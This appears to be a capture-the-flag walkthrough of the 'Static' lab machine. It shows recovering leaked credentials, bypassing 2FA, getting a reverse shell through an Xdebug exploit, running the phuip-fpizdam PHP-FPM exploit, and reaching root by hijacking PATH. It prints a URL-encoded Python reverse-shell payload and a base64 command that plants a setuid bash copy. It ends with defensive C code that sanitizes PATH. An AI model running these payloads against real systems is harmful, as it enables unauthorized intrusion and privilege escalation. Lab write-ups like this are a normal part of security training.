In this post, I would like to share a walkthrough of the Static Machine.


This machine has been rated as Hard difficulty.

Information Gathering on Static Machine


Once we have started the VPN connection, we can begin information gathering on the machine by executing the command nmap -sC -sV <IP Address> -Pn


From the result, we got a few ports open such as:

  • 21: vsftpd 3.0.3
  • 22: OpenSSH 8.2p1
  • 80: gunicorn

Let’s access the web interface at static.htb:8080/.ftp_uploads/


There are two files that we can see here.


When I try to open warning.txt:


We need to download db.sql.gz onto our machine and look at what is stored inside the file.


Sadly, the file is corrupted, as mentioned in warning.txt.


Let’s do some research on the internet on how to recover the file.


The research didn’t show anything useful at first. Let’s scroll down and hope to find a tool we can use.


We managed to find a tool called gzrecover on GitHub.

Gaining Privileged Access on the Static machine


The tool can be downloaded here.


Once gzrecover is fully installed, we can run it with the command sudo ./gzrecover db.sql.gz


We managed to recover the file; let’s read the recovered output.


However, the recovered file contains some encrypted content, although it clearly shows MySQL statements. After decrypting it, you will find credentials saved there.

  • username=admin
  • password=admin

Trying to bypass 2FA authentication


From our nmap result, we notice that static.htb:8080 has a /vpn/ directory.


I found that login.php is running in the /vpn/ directory, which leads to a login page.


Once you have entered the credentials on the login page, it redirects to a 2FA Enabled page that looks like the one shown above.


We will need to bypass the 2FA by running the command above.


It shows an Internal IT Support portal where you need to enter any name, after which a new VPN configuration is downloaded to your machine.

Downloading the OpenVPN configuration


In the VPN file, I noticed another subdomain, vpn.static.htb, written there.


Let’s use the VPN file that we downloaded previously.


We should route 172.20.0.0/24 through the OpenVPN tunnel.


We should now be able to access 172.20.0.10, which hosts an info.php file.


Let’s start our nc listener on our machine.


We should start the exploit by running python2 exploit.py


(I have renamed the Python file to exploit.py.)


I tried the command as above, but nothing happened on my nc listener.


It works with this payload, though.


After entering the reverse shell payload, you should browse to 172.20.0.10/info.php?XDEBUG_SESSION_START=phpstorm


Voila! As a result, we get the reverse shell connection back to us.


Finally, we should be able to read the user flag by typing “cat user.txt”

Escalating to Root Privileges


First, we need to transfer ncat from our machine to the victim’s machine.


We should set up port forwarding by executing the command ssh -N -L <anyport>:192.168.254.3:80 -i id_rsa www-data@172.20.0.10


Next, we exploit it by using the command ./phuip-fpizdam http://localhost:<anyport>/index.php


Then, we need to open the following URL in the browser:

localhost:<anyport>/index.php?a=/usr/bin/python3.6%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.254.2%22%2C4242))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bimport%20pty%3B%20pty.spawn(%22%2Fbin%2Fbash%22)%27%0A

Finally, we get the reverse shell connection back to us.


Let’s execute the following command:

echo 'IyEvYmluL2Jhc2gKL2Jpbi9jcCAvYmluL2Jhc2ggL3RtcC9iYXNoIC0tbm8tcHJlc2VydmU9YWxsCi9iaW4vY2hvd24gcm9vdDpyb290IC90bXAvYmFzaAovYmluL2NobW9kIDQ3NzcgL3RtcC9iYXNoCg==' | base64 -d > /tmp/readlink

After that, we rename the readlink file to sed (the name itself shouldn’t matter).


Once you have renamed the file, we need to run export PATH=/tmp:$PATH before proceeding with the next step.


Once that has been done, we can now execute the following command:

  • /usr/bin/ersatool
  • create
  • x
  • enter
  • exit

At last, we should see the bash file in the /tmp/ directory.


Next, we need to execute the bash -p command in the /tmp/ directory.


Finally, we should be able to read the root flag by running the “cat /root/root.txt” command.
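The escalation above works because a privileged tool resolves helpers like readlink or sed through a PATH that the caller controls, so prepending /tmp is enough to substitute a malicious binary. As an added defensive example (not part of the original post or of the machine's tools), the following C function strips untrusted entries from a PATH string before a privileged helper spawns any subprocess; the list of untrusted prefixes is an assumption and should be extended for your environment.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Directories a privileged helper must never resolve commands from.
   Assumed list for this example: world-writable locations. */
static const char *untrusted_prefixes[] = { "/tmp", "/var/tmp", "/dev/shm", NULL };

/* An entry is trusted only if it is absolute and not under an untrusted prefix.
   Empty entries and "." (current directory) are rejected as relative. */
static int is_trusted_dir(const char *dir) {
    if (dir[0] != '/') return 0;
    for (int i = 0; untrusted_prefixes[i]; i++) {
        size_t n = strlen(untrusted_prefixes[i]);
        if (strncmp(dir, untrusted_prefixes[i], n) == 0 &&
            (dir[n] == '\0' || dir[n] == '/'))
            return 0;
    }
    return 1;
}

/* Return a newly allocated PATH containing only trusted entries, in the
   original order (caller frees). Output is never longer than the input. */
char *sanitize_path(const char *path) {
    char *out = calloc(strlen(path) + 1, 1);
    if (!out) return NULL;
    const char *p = path;
    while (*p) {
        const char *end = strchr(p, ':');
        size_t n = end ? (size_t)(end - p) : strlen(p);
        char entry[4096];
        if (n < sizeof entry) {
            memcpy(entry, p, n);
            entry[n] = '\0';
            if (is_trusted_dir(entry)) {
                if (out[0]) strcat(out, ":");
                strcat(out, entry);
            }
        }
        if (!end) break;
        p = end + 1;
    }
    return out;
}

int main(void) {
    /* Constructed example: the PATH an attacker exports before running the tool. */
    char *clean = sanitize_path("/tmp:/usr/local/sbin:/usr/bin:/bin:.");
    printf("sanitized PATH: %s\n", clean);  /* /usr/local/sbin:/usr/bin:/bin */
    free(clean);
    return 0;
}
```

In a setuid or sudo-invoked binary, combine this with invoking helpers by absolute path (for example /usr/bin/sed) so that PATH is never consulted at all.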